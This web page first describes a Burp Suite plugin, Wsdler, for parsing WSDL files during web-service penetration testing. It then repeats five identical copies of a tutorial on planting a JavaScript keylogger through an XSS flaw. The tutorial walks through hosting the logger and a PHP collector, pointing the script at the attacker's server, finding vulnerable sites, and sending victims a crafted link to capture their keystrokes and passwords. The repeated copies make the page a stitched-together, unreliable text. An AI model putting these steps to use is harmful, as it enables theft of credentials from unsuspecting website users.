Header Ads

Hacking Web Services with Burp

WSDL (Web Services Description Language) files are XML formatted
descriptions about the operations of web services between clients and
servers. They contain possible requests along with the parameters an
application uses to communicate with a web service. This is great for
penetration testers because we can test and manipulate web services all
we want using the information from WSDL files.
One of the best tools to use for working with HTTP requests and
responses for applications is Burp. The only downside with Burp is that
it does not natively support parsing of WSDL files into requests that
can be sent to a web service. A common work around has been to use a
tool such as Soap-UI and proxy the requests to Burp for further
manipulation. I’ve written a plugin for Burp that takes a WSDL request
and parses out the operations that are associated with the targeted web
service and creates SOAP requests which can then be sent to a web
service. This plugin builds upon the work done by Tom Bujok and his soap-ws project which is essentially the WSDL parsing portion of Soap-UI without the UI.
The Wsdler plugin along with all the source is located at the Github repository here: https://github.com/NetSPI/Wsdler.

Wsdler Requirements

Burp 1.5.01 or later

Must be run from the command line

Starting Wsdler

The command to start Burp with the Wsdler plugin is as follows:java -classpath Wsdler.jar;burp.jar burp.StartBurp

Sample Usage

Here we will intercept the request for a WSDL file belonging to an online store in Burp.
After the request for the WSDL has been intercepted, right click on the request and select Parse WSDL.
A new Wsdler tab will open with the parsed operations for the WSDL,
along with the bindings and ports for each of the operations. Operations
are synonymous with the requests that the application supports. There
are two operations in this WSDL file, OrderItem and CheckStatus. Each of
these operations has two bindings, for simplicity’s sake, bindings
describe the format and protocol for each of the operations. The
bindings for both of the operations are InstantOrderSoap and
InstantOrderSoap12. The reason there are two bindings for each of the
operations is because the WSDL file supports the creation of SOAP 1.1
and 1.2 requests. Finally, the ”Port” for each of the operations is
essentially just the URL the request will be sent to. The full
specification for each of the Objects in WSDL files can be read here: http://www.w3.org/TR/wsdl.
The SOAP requests for the operations will be in the lower part of the
Burp window. The parsing functionality will also automatically fill in
the data type for each of the parameters in the WSDL operation. In this
example, strings are filled in with parts of the Aeneid and integers are
filled in with numbers.
The request that Wsdler creates is a standard Burp request, so it can
be sent to any other Burp function that accepts requests (intruder,
repeater, etc.).
Here the request is sent to intruder for further testing. Because the
request is XML, Burp automatically identifies the parameters for
intruder to use.

Conclusion

Currently, the plugin only supports WSDL specification 1.1, but there
is work on supporting 1.2 / 2.0. Also, I will be adding the option to
specify your own strings and integers when the plugin automatically
fills in the appropriate data type for each of the parameters in the
parsed operations. If there are any bugs or features that you would like
to see added, send me an email or create a ticket on Github.

Keylogger is the tool which is used to record the key events. We all
know about the keyloggers used int the computer to capture the
keystrokes. But this tutorial guide you to create and use a keylogger on
a website to capture all keystrokes on that page.
As the name suggest, It only works on the website that are XSS
vulnerable. As we know that we can run our own scripts on those website
which have XSS vulnerability. We use our Keylogging script on XSS
vulnerable website.
For this attack we need three things:
Kelogging script.
XSS vulnerable website
A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP.
PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL is
http://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like
this:
http://targetwebsite.com/search.php?q="
Now if someone clicks on that link everything they type in on that page
will go to the data.txt file. This script will capture all the keystroke
and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can
be used to grab passwords - See more at:
http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Keylogger is the tool which is used to record the key events. We all
know about the keyloggers used int the computer to capture the
keystrokes. But this tutorial guide you to create and use a keylogger on
a website to capture all keystrokes on that page.
As the name suggest, It only works on the website that are XSS
vulnerable. As we know that we can run our own scripts on those website
which have XSS vulnerability. We use our Keylogging script on XSS
vulnerable website.
For this attack we need three things:
Kelogging script.
XSS vulnerable website
A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP.
PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL is
http://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like
this:
http://targetwebsite.com/search.php?q="
Now if someone clicks on that link everything they type in on that page
will go to the data.txt file. This script will capture all the keystroke
and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can
be used to grab passwords - See more at:
http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Keylogger is the tool which is used to record the key events. We all
know about the keyloggers used int the computer to capture the
keystrokes. But this tutorial guide you to create and use a keylogger on
a website to capture all keystrokes on that page.
As the name suggest, It only works on the website that are XSS
vulnerable. As we know that we can run our own scripts on those website
which have XSS vulnerability. We use our Keylogging script on XSS
vulnerable website.
For this attack we need three things:
Kelogging script.
XSS vulnerable website
A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP.
PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL is
http://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like
this:
http://targetwebsite.com/search.php?q="
Now if someone clicks on that link everything they type in on that page
will go to the data.txt file. This script will capture all the keystroke
and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can
be used to grab passwords - See more at:
http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Keylogger is the tool which is used to record the key events. We all
know about the keyloggers used int the computer to capture the
keystrokes. But this tutorial guide you to create and use a keylogger on
a website to capture all keystrokes on that page.
As the name suggest, It only works on the website that are XSS
vulnerable. As we know that we can run our own scripts on those website
which have XSS vulnerability. We use our Keylogging script on XSS
vulnerable website.
For this attack we need three things:
Kelogging script.
XSS vulnerable website
A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP.
PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL is
http://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like
this:
http://targetwebsite.com/search.php?q="
Now if someone clicks on that link everything they type in on that page
will go to the data.txt file. This script will capture all the keystroke
and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can
be used to grab passwords - See more at:
http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Keylogger is the tool which is used to record the key events. We all
know about the keyloggers used int the computer to capture the
keystrokes. But this tutorial guide you to create and use a keylogger on
a website to capture all keystrokes on that page.
As the name suggest, It only works on the website that are XSS
vulnerable. As we know that we can run our own scripts on those website
which have XSS vulnerability. We use our Keylogging script on XSS
vulnerable website.
For this attack we need three things:
Kelogging script.
XSS vulnerable website
A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP.
PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL is
http://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like
this:
http://targetwebsite.com/search.php?q="
Now if someone clicks on that link everything they type in on that page
will go to the data.txt file. This script will capture all the keystroke
and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can
be used to grab passwords - See more at:
http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf